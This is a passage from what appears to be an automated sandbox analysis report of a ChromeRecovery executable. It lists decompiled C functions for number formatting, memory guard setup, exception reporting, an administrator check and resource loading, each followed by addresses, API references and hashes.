							_t87 = _a28 ^ 0x00000001;
							_v20 = 0x3ff;
							_v5 = _t87;
							_v16 = _t174;
							_v48 = ((_t87 & 0x000000ff) << 5) + 7;
							__eflags = _t147 & 0x7ff00000;
							_t93 = 0x30;
							if((_t147 & 0x7ff00000) != 0) {
								 *_t183 = 0x31;
								L18:
								_t149 = 0;
								__eflags = 0;
								L19:
								_t184 =  &(_t174[0]);
								__eflags = _t186;
								if(_t186 != 0) {
									_t94 = _a40;
									__eflags =  *((char*)(_t94 + 0x14));
									if(__eflags == 0) {
										E00C88A50(_t94, _t174, __eflags);
										_t94 = _a40;
										_t174 = _v16;
									}
									_t149 = 0;
									__eflags = 0;
									_t98 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)) + 0x88))))));
								} else {
									_t98 = _t149;
								}
								 *_t174 = _t98;
								_t100 = _t140[1] & 0x000fffff;
								__eflags = _t100;
								_v40 = _t100;
								if(_t100 > 0) {
									L26:
									_t175 = _t149;
									_t150 = 0xf0000;
									_t101 = 0x30;
									_v12 = _t101;
									_v24 = _t149;
									_v28 = 0xf0000;
									while(1) {
										_v32 = _v12 & 0x0000ffff;
										_t104 = _t184;
										_v36 = _t184;
										_v40 = _t186;
										__eflags = _t186;
										if(__eflags <= 0) {
											break;
										}
										_t127 = E00C93CB0( *_t140 & _t175, _v32 & 0x0000ffff, _t140[1] & _t150 & 0x000fffff);
										_t161 = 0x30;
										_t129 = _t127 + _t161 & 0x0000ffff;
										__eflags = _t129 - 0x39;
										if(_t129 > 0x39) {
											_t129 = _t129 + _v48;
											__eflags = _t129;
										}
										_t162 = _v28;
										_t175 = (_t162 << 0x00000020 | _v24) >> 4;
										 *_t184 = _t129;
										_t184 = _t184 + 1;
										_t150 = _t162 >> 4;
										_t131 = _v12 - 4;
										_t186 = _t186 - 1;
										_v24 = (_t162 << 0x00000020 | _v24) >> 4;
										_v28 = _t162 >> 4;
										_v12 = _t131;
										__eflags = _t131;
										if(_t131 >= 0) {
											continue;
										} else {
											goto L43;
										}
									}
									_t186 = _v40;
									_t184 = _t104;
									_t105 = E00C8D110(__eflags, _t140, _t175, _t150, _v32, _a36);
									_t190 = _t190 + 0x14;
									__eflags = _t105;
									if(_t105 == 0) {
										goto L43;
									}
									_t184 = _v36;
									_t146 = 0x30;
									_t124 = _t184 - 1;
									while(1) {
										_t156 =  *_t124;
										__eflags = _t156 - 0x66;
										if(_t156 == 0x66) {
											goto L36;
										}
										__eflags = _t156 - 0x46;
										if(_t156 != 0x46) {
											_t140 = _a4;
											__eflags = _t124 - _v16;
											if(_t124 == _v16) {
												_t65 = _t124 - 1;
												 *_t65 =  *(_t124 - 1) + 1;
												__eflags =  *_t65;
											} else {
												__eflags = _t156 - 0x39;
												if(_t156 != 0x39) {
													_t157 = _t156 + 1;
													__eflags = _t157;
												} else {
													_t157 = _v48 + 0x3a;
												}
												 *_t124 = _t157;
											}
											goto L43;
										}
										L36:
										 *_t124 = _t146;
										_t124 = _t124 - 1;
									}
								} else {
									__eflags =  *_t140 - _t149;
									if( *_t140 <= _t149) {
										L43:
										__eflags = _t186;
										if(_t186 > 0) {
											_push(_t186);
											_t122 = 0x30;
											_push(_t122);
											_push(_t184);
											E00C81190(_t184);
											_t184 = _t184 + _t186;
											__eflags = _t184;
										}
										_t106 = _v16;
										__eflags =  *_t106;
										if( *_t106 == 0) {
											_t184 = _t106;
										}
										 *_t184 = (_v5 << 5) + 0x50;
										_t176 = _t140[1];
										_t111 = E00C93CB0( *_t140, 0x34, _t176);
										_t141 = 0;
										_t188 = _t176 & 0;
										_t177 = _t184 + 2;
										_t154 = (_t111 & 0x000007ff) - _v20;
										__eflags = _t154;
										_v48 = _t177;
										asm("sbb esi, ebx");
										if(__eflags < 0) {
											L51:
											_t154 =  ~_t154;
											asm("adc esi, ebx");
											_t188 =  ~_t188;
											0x2b = 0x2d;
											goto L52;
										} else {
											if(__eflags > 0) {
												L50:
												L52:
												 *(_t184 + 1) = 0x2b;
												_t185 = _t177;
												_t113 = 0x30;
												 *_t177 = _t113;
												__eflags = _t188 - _t141;
												if(__eflags < 0) {
													L61:
													_t178 = 0x30;
													L62:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														L66:
														_t155 = _t154 + _t178;
														__eflags = _t155;
														 *_t185 = _t155;
														 *(_t185 + 1) = _t141;
														L67:
														_t114 = 0;
														__eflags = 0;
														L68:
														return _t114;
													}
													if(__eflags > 0) {
														L65:
														_push(_t141);
														_push(_t141);
														_push(0xa);
														_push(_t188);
														_push(_t154);
														_t115 = E00C93BB0();
														_v48 = _t178;
														_t178 = 0x30;
														 *_t185 = _t115 + _t178;
														_t185 = _t185 + 1;
														_t141 = 0;
														__eflags = 0;
														goto L66;
													}
													__eflags = _t154 - 0xa;
													if(_t154 < 0xa) {
														goto L66;
													}
													goto L65;
												}
												if(__eflags > 0) {
													L55:
													_push(_t141);
													_push(_t141);
													_push(0x3e8);
													_push(_t188);
													_push(_t154);
													_t118 = E00C93BB0();
													_t188 = _t141;
													_v40 = _t177;
													_t177 = _v48;
													_t141 = 0;
													_t76 = _t177 + 1; // 0x1
													_t185 = _t76;
													 *_t177 = _t118 + 0x30;
													__eflags = _t185 - _t177;
													if(_t185 != _t177) {
														L59:
														_push(_t141);
														_push(_t141);
														_push(0x64);
														_push(_t188);
														_push(_t154);
														_t120 = E00C93BB0();
														_t188 = _t141;
														_v40 = _t177;
														_t141 = 0;
														_t178 = 0x30;
														 *_t185 = _t120 + _t178;
														_t185 = _t185 + 1;
														__eflags = _t185 - _v48;
														if(_t185 != _v48) {
															goto L65;
														}
														goto L62;
													}
													L56:
													__eflags = _t188 - _t141;
													if(__eflags < 0) {
														goto L61;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t154 - 0x64;
													if(_t154 < 0x64) {
														goto L61;
													}
													goto L59;
												}
												__eflags = _t154 - 0x3e8;
												if(_t154 < 0x3e8) {
													goto L56;
												}
												goto L55;
											}
											__eflags = _t154;
											if(_t154 < 0) {
												goto L51;
											}
											goto L50;
										}
									}
									goto L26;
								}
							}
							 *_t183 = _t93;
							_t149 =  *_t140 | _t140[1] & 0x000fffff;
							__eflags = _t149;
							if(_t149 != 0) {
								_v20 = 0x3fe;
								goto L18;
							}
							_v20 = _t149;
							goto L19;
						}
						if(__eflags < 0) {
							L12:
							 *_t183 = 0x2d;
							_t183 = _t183 + 1;
							__eflags = _t183;
							_t147 = _t140[1];
							goto L13;
						}
						__eflags = _t173;
						if(_t173 >= 0) {
							goto L13;
						}
						goto L12;
					}
					_t114 = E00C8CC0B(_t140, _t147, __eflags, _t140, _t183, _a12, _a16, _a20, _t186, 0, _a32, _a36, _a40);
					__eflags = _t114;
					if(_t114 == 0) {
						_t136 = E00C95070(_t183, 0x65);
						__eflags = _t136;
						if(_t136 != 0) {
							 *_t136 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							 *((char*)(_t136 + 3)) = 0;
						}
						goto L67;
					}
					 *_t183 = 0;
					goto L68;
				}
				_t171 = _a40;
				_t189 = 0x22;
				 *((char*)(_t171 + 0x1c)) = 1;
				 *((intOrPtr*)(_t171 + 0x18)) = _t189;
				E00C833BC(_t183, _t189, 0, 0, 0, 0, 0, _t171);
				return _t189;
			}

0x00c8c8ea
0x00c8c8f0
0x00c8c8f2
0x00c8c8f2
0x00c8c8f4
0x00c8c8f7
0x00c8c8fa
0x00c8c8ff
0x00c8c924
0x00c8c927
0x00c8c92c
0x00c8c936
0x00c8c93b
0x00c8c994
0x00c8c996
0x00c8c9a5
0x00c8c9a8
0x00c8c9ab
0x00c8c9ad
0x00c8c9b4
0x00c8c9c6
0x00c8c9c9
0x00c8c9ce
0x00c8c9d2
0x00c8c9d3
0x00c8c9f3
0x00c8c9f6
0x00c8c9f6
0x00c8c9f6
0x00c8c9f8
0x00c8c9f8
0x00c8c9fb
0x00c8c9fd
0x00c8ca03
0x00c8ca06
0x00c8ca0a
0x00c8ca0e
0x00c8ca13
0x00c8ca16
0x00c8ca16
0x00c8ca1c
0x00c8ca1c
0x00c8ca26
0x00c8c9ff
0x00c8c9ff
0x00c8c9ff
0x00c8ca28
0x00c8ca2d
0x00c8ca2d
0x00c8ca32
0x00c8ca35
0x00c8ca3f
0x00c8ca41
0x00c8ca43
0x00c8ca48
0x00c8ca49
0x00c8ca4c
0x00c8ca4f
0x00c8ca52
0x00c8ca58
0x00c8ca5b
0x00c8ca5d
0x00c8ca60
0x00c8ca63
0x00c8ca65
0x00000000
0x00000000
0x00c8ca7c
0x00c8ca83
0x00c8ca87
0x00c8ca8a
0x00c8ca8d
0x00c8ca8f
0x00c8ca8f
0x00c8ca8f
0x00c8ca95
0x00c8ca98
0x00c8ca9c
0x00c8ca9e
0x00c8caa2
0x00c8caa5
0x00c8caa8
0x00c8caa9
0x00c8caac
0x00c8caaf
0x00c8cab2
0x00c8cab5
0x00000000
0x00c8cab7
0x00000000
0x00c8cab7
0x00c8cab5
0x00c8cabc
0x00c8cabf
0x00c8cac7
0x00c8cacc
0x00c8cacf
0x00c8cad1
0x00000000
0x00000000
0x00c8cad3
0x00c8cad8
0x00c8cad9
0x00c8cadc
0x00c8cadc
0x00c8cade
0x00c8cae1
0x00000000
0x00000000
0x00c8cae3
0x00c8cae6
0x00c8caed
0x00c8caf0
0x00c8caf3
0x00c8cb08
0x00c8cb08
0x00c8cb08
0x00c8caf5
0x00c8caf5
0x00c8caf8
0x00c8cb02
0x00c8cb02
0x00c8cafa
0x00c8cafd
0x00c8cafd
0x00c8cb04
0x00c8cb04
0x00000000
0x00c8caf3
0x00c8cae8
0x00c8cae8
0x00c8caea
0x00c8caea
0x00c8ca37
0x00c8ca37
0x00c8ca39
0x00c8cb0b
0x00c8cb0b
0x00c8cb0d
0x00c8cb0f
0x00c8cb12
0x00c8cb13
0x00c8cb14
0x00c8cb15
0x00c8cb1d
0x00c8cb1d
0x00c8cb1d
0x00c8cb1f
0x00c8cb22
0x00c8cb25
0x00c8cb27
0x00c8cb27
0x00c8cb33
0x00c8cb37
0x00c8cb3a
0x00c8cb3f
0x00c8cb4b
0x00c8cb4d
0x00c8cb50
0x00c8cb50
0x00c8cb53
0x00c8cb56
0x00c8cb58
0x00c8cb64
0x00c8cb64
0x00c8cb68
0x00c8cb6a
0x00c8cb6c
0x00000000
0x00c8cb5a
0x00c8cb5a
0x00c8cb60
0x00c8cb6d
0x00c8cb6d
0x00c8cb70
0x00c8cb74
0x00c8cb75
0x00c8cb77
0x00c8cb79
0x00c8cbd5
0x00c8cbd7
0x00c8cbd8
0x00c8cbd8
0x00c8cbda
0x00c8cbfd
0x00c8cbfd
0x00c8cbfd
0x00c8cbff
0x00c8cc01
0x00c8cc04
0x00c8cc04
0x00c8cc04
0x00c8cc06
0x00000000
0x00c8cc06
0x00c8cbdc
0x00c8cbe3
0x00c8cbe3
0x00c8cbe4
0x00c8cbe5
0x00c8cbe7
0x00c8cbe8
0x00c8cbe9
0x00c8cbf2
0x00c8cbf5
0x00c8cbf8
0x00c8cbfa
0x00c8cbfb
0x00c8cbfb
0x00000000
0x00c8cbfb
0x00c8cbde
0x00c8cbe1
0x00000000
0x00000000
0x00000000
0x00c8cbe1
0x00c8cb80
0x00c8cb86
0x00c8cb86
0x00c8cb87
0x00c8cb88
0x00c8cb89
0x00c8cb8a
0x00c8cb8b
0x00c8cb90
0x00c8cb94
0x00c8cb99
0x00c8cb9c
0x00c8cb9e
0x00c8cb9e
0x00c8cba1
0x00c8cba3
0x00c8cba5
0x00c8cbb2
0x00c8cbb2
0x00c8cbb3
0x00c8cbb4
0x00c8cbb6
0x00c8cbb7
0x00c8cbb8
0x00c8cbbd
0x00c8cbc3
0x00c8cbc6
0x00c8cbc8
0x00c8cbcb
0x00c8cbcd
0x00c8cbce
0x00c8cbd1
0x00000000
0x00000000
0x00000000
0x00c8cbd3
0x00c8cba7
0x00c8cba7
0x00c8cba9
0x00000000
0x00000000
0x00c8cbab
0x00000000
0x00000000
0x00c8cbad
0x00c8cbb0
0x00000000
0x00000000
0x00000000
0x00c8cbb0
0x00c8cb82
0x00c8cb84
0x00000000
0x00000000
0x00000000
0x00c8cb84
0x00c8cb5c
0x00c8cb5e
0x00000000
0x00000000
0x00000000
0x00c8cb5e
0x00c8cb58
0x00000000
0x00c8ca39
0x00c8ca35
0x00c8c9d5
0x00c8c9e1
0x00c8c9e1
0x00c8c9e3
0x00c8c9ea
0x00000000
0x00c8c9ea
0x00c8c9e5
0x00000000
0x00c8c9e5
0x00c8c998
0x00c8c99e
0x00c8c99e
0x00c8c9a1
0x00c8c9a1
0x00c8c9a2
0x00000000
0x00c8c9a2
0x00c8c99a
0x00c8c99c
0x00000000
0x00000000
0x00000000
0x00c8c99c
0x00c8c955
0x00c8c95d
0x00c8c95f
0x00c8c96c
0x00c8c973
0x00c8c975
0x00c8c987
0x00c8c989
0x00c8c989
0x00000000
0x00c8c975
0x00c8c961
0x00000000
0x00c8c961
0x00c8c901
0x00c8c906
0x00c8c90d
0x00c8c911
0x00c8c914
0x00000000

APIs

_strrchr.LIBCMT ref: 00C8C96C

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 716d4ecc26b77629a783732f3220bcc07c94400b1eb225cbe04deade8fe57c63
Instruction ID: 514f3f4a6347a61b78b1ce34a2d2e84d7deac144880a9ba82654006ac40710e3
Opcode Fuzzy Hash: 716d4ecc26b77629a783732f3220bcc07c94400b1eb225cbe04deade8fe57c63
Instruction Fuzzy Hash: 6EB18B729046459FDB15EF68C8C2BFEBBA4EF55318F1481AAE414AB341D2349E01CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 00C9525D Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00C9525D(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebp;
				signed int _t18;
				void* _t21;
				long _t22;
				long _t29;
				signed int _t38;
				signed int _t44;
				void* _t46;
				char _t48;
				long _t51;
				signed int _t52;
				void* _t53;

				_t18 =  *0xca8008; // 0x617e0cdd
				_v8 = _t18 ^ _t52;
				_push(4);
				E00C93CD0();
				_t21 = _t53;
				_v16 = _t21;
				_t22 = VirtualQuery(_t21,  &_v52, 0x1c);
				_t55 = _t22;
				if(_t22 == 0) {
					L12:
					__eflags = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t38 = _v88.dwPageSize;
					_t48 = 0;
					_v12 = 0;
					if(E00C8AB6E(_t55,  &_v12) != 0 && _v12 > 0) {
						_t48 = _v12;
					}
					_t44 =  ~_t38;
					_t51 = _t48 - 0x00000001 + _t38 & _t44;
					if(_t51 != 0) {
						_t51 = _t51 + _t38;
					}
					_t29 = _t38 + _t38;
					if(_t51 < _t29) {
						_t51 = _t29;
					}
					_t46 = (_t44 & _v16) - _t51;
					if(_t46 < _v20 + _t38 || VirtualAlloc(_t46, _t51, 0x1000, 4) == 0 || VirtualProtect(_t46, _t51, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
					}
				}
				return E00C7F35B(_v8 ^ _t52);
			}

0x00c95265
0x00c9526c
0x00c95272
0x00c95275
0x00c9527a
0x00c95283
0x00c95286
0x00c9528c
0x00c9528e
0x00c9530e
0x00c9530e
0x00c95290
0x00c95293
0x00c9529a
0x00c952a0
0x00c952a6
0x00c952a9
0x00c952b3
0x00c952ba
0x00c952ba
0x00c952c0
0x00c952c4
0x00c952c6
0x00c952c8
0x00c952c8
0x00c952ca
0x00c952cf
0x00c952d1
0x00c952d1
0x00c952d9
0x00c952df
0x00000000
0x00c95309
0x00c9530b
0x00c952df
0x00c95321

APIs

VirtualQuery.KERNEL32 ref: 00C95286
GetSystemInfo.KERNEL32 ref: 00C9529A
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 00C952EA
VirtualProtect.KERNEL32 ref: 00C952FF

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Virtual$AllocInfoProtectQuerySystem
String ID:
API String ID: 3562403962-0
Opcode ID: 595d31bbedadb05cff3ea9b0f037a5a7cd38b30245bc63cf5dd0e3d5a229ebd2
Instruction ID: 86678f9956e973fd02bec3781e8f1ca0a910618d3efd16b81a7f4427594d5825
Opcode Fuzzy Hash: 595d31bbedadb05cff3ea9b0f037a5a7cd38b30245bc63cf5dd0e3d5a229ebd2
Instruction Fuzzy Hash: D1219272F10A19ABDF219BA4CD89BEFB7B8EB44754F140166E915E7140E770DA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F243 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7F243(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E00C7F296(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0xc70000;
				 *((intOrPtr*)(__ecx + 4)) = 0xc70000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0xc973e0;
				if(E00C711E1(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0xca9b84 = 1;
				}
				return _t13;
			}

0x00c7f244
0x00c7f246
0x00c7f250
0x00c7f259
0x00c7f25c
0x00c7f25f
0x00c7f266
0x00c7f274
0x00c7f27e
0x00c7f285
0x00c7f285
0x00c7f28b
0x00c7f28b
0x00c7f295

APIs

Part of subcall function 00C711E1: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00C711E6
Part of subcall function 00C711E1: GetLastError.KERNEL32 ref: 00C711F0

IsDebuggerPresent.KERNEL32 ref: 00C7F276
OutputDebugStringW.KERNEL32 ref: 00C7F285

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C7F280

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 450123788-631824599
Opcode ID: 6b7ad3de6a1328e6a671fc0636e600b2b84998fde5dc20324cca6a8f66098728
Instruction ID: dbe4484c65ce724d0327b8b3c876138c2ea5129320d0b329ff2029f4b8122f61
Opcode Fuzzy Hash: 6b7ad3de6a1328e6a671fc0636e600b2b84998fde5dc20324cca6a8f66098728
Instruction Fuzzy Hash: 84E09274205301CBD7309F69E54C34A7BE4BF04344F00CA6DE84AC3251E7B0D4488BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C8323D Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E00C8323D(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __ebp;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xca8008; // 0x617e0cdd
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00C7FE4D(_t41);
					_pop(_t62);
				}
				E00C81190(_t67,  &_v804, 0, 0x50);
				E00C81190(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00C7FE4D(_t57);
				}
				return E00C7F35B(_v8 ^ _t70);
			}

0x00c8323d
0x00c8323d
0x00c8323d
0x00c8323d
0x00c83248
0x00c8324d
0x00c8324f
0x00c83257
0x00c83259
0x00c8325c
0x00c83261
0x00c83261
0x00c8326d
0x00c83280
0x00c8328e
0x00c83294
0x00c8329a
0x00c832a0
0x00c832a6
0x00c832ac
0x00c832b2
0x00c832b8
0x00c832be
0x00c832c4
0x00c832cb
0x00c832d2
0x00c832d9
0x00c832e0
0x00c832e7
0x00c832ee
0x00c832ef
0x00c832f8
0x00c832fe
0x00c83301
0x00c83307
0x00c83314
0x00c8331d
0x00c83326
0x00c8332f
0x00c8333d
0x00c8333f
0x00c83354
0x00c83360
0x00c83363
0x00c83368
0x00c83375

APIs

IsDebuggerPresent.KERNEL32 ref: 00C83335
SetUnhandledExceptionFilter.KERNEL32 ref: 00C8333F
UnhandledExceptionFilter.KERNEL32(?), ref: 00C8334C

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 373cc433930df742f0998209224309c9db0b2af407e39f3f8cc33783d544ab7b
Instruction ID: 695dc94c45a797666fe82d182261951f53bc7070902c8b9e260f67aed611e057
Opcode Fuzzy Hash: 373cc433930df742f0998209224309c9db0b2af407e39f3f8cc33783d544ab7b
Instruction Fuzzy Hash: B331C5749012189BCB61DF28DC8979DBBB8BF18714F5041EAE41CA7261EB709F859F44

Uniqueness

Uniqueness Score: -1.00%

Function 00C78FB3 Relevance: 4.5, APIs: 3, Instructions: 47
memoryCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00C78FB3(void* __ebx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				signed int _v20;
				void* _v24;
				void* __ebp;
				signed int _t17;
				signed int _t24;
				signed int _t31;

				_t17 =  *0xca8008; // 0x617e0cdd
				_v8 = _t17 ^ _t31;
				_v12 = 0x500;
				_v16.Value = 0;
				_v24 = 0;
				_t21 = AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
				_v20 = _t21;
				if(_t21 != 0) {
					_t24 =  &_v20;
					__imp__CheckTokenMembership(0, _v24, _t24);
					asm("sbb eax, eax");
					_v20 = _v20 &  ~_t24;
					FreeSid(_v24);
					_t21 = _v20;
				}
				return E00C7F35B(_v8 ^ _t31);
			}

0x00c78fb9
0x00c78fc0
0x00c78fc6
0x00c78fcf
0x00c78fe5
0x00c78fe9
0x00c78fef
0x00c78ff4
0x00c78ff6
0x00c78ffe
0x00c79009
0x00c7900b
0x00c7900e
0x00c79014
0x00c79017
0x00c79028

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00C78FE9
CheckTokenMembership.ADVAPI32(00000000,?,00C7A636), ref: 00C78FFE
FreeSid.ADVAPI32(?,?,?,00C7A636,?), ref: 00C7900E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d5015228b7b12a5a9e4f9e9de1908b605cce75c4575fcb695ec109a27752912f
Instruction ID: bcf24c9beab9b38e9e27c41ac5e4a67b6c243114ff2de304956bd093a0d3cad2
Opcode Fuzzy Hash: d5015228b7b12a5a9e4f9e9de1908b605cce75c4575fcb695ec109a27752912f
Instruction Fuzzy Hash: 79012C70E1020DAFDF00DFB4DC89ABEB7B8FB08304F504569A501E2181D7309A048B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C71209 Relevance: 4.5, APIs: 3, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C71209(struct HINSTANCE__* __ecx, struct HRSRC__* __edx, signed int _a4) {
				void* _t5;
				struct HINSTANCE__* _t11;
				void* _t13;
				signed int _t16;
				struct HRSRC__* _t17;
				signed short* _t18;

				_t17 = __edx;
				_t11 = __ecx;
				_t5 = LoadResource(__ecx, __edx);
				if(_t5 == 0) {
					L8:
					return 0;
				}
				_t18 = LockResource(_t5);
				if(_t18 == 0) {
					goto L8;
				}
				_t13 = _t18 + SizeofResource(_t11, _t17);
				_t16 = _a4 & 0x0000000f;
				if(_t16 <= 0) {
					L5:
					if(_t18 >= _t13 ||  *_t18 == 0) {
						goto L8;
					} else {
						return _t18;
					}
				}
				while(_t18 < _t13) {
					_t18 =  &(( &(_t18[ *_t18 & 0x0000ffff]))[1]);
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L5;
				}
				goto L8;
			}

0x00c7120f
0x00c71211
0x00c71215
0x00c7121d
0x00c7125f
0x00000000
0x00c7125f
0x00c71226
0x00c7122a
0x00000000
0x00000000
0x00c71237
0x00c7123a
0x00c7123d
0x00c71251
0x00c71253
0x00000000
0x00c7125b
0x00000000
0x00c7125b
0x00c71253
0x00c7123f
0x00c71249
0x00c7124c
0x00c7124f
0x00000000
0x00000000
0x00000000
0x00c7124f
0x00000000

APIs

LoadResource.KERNEL32 ref: 00C71215
LockResource.KERNEL32(00000000), ref: 00C71220
SizeofResource.KERNEL32 ref: 00C7122E

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

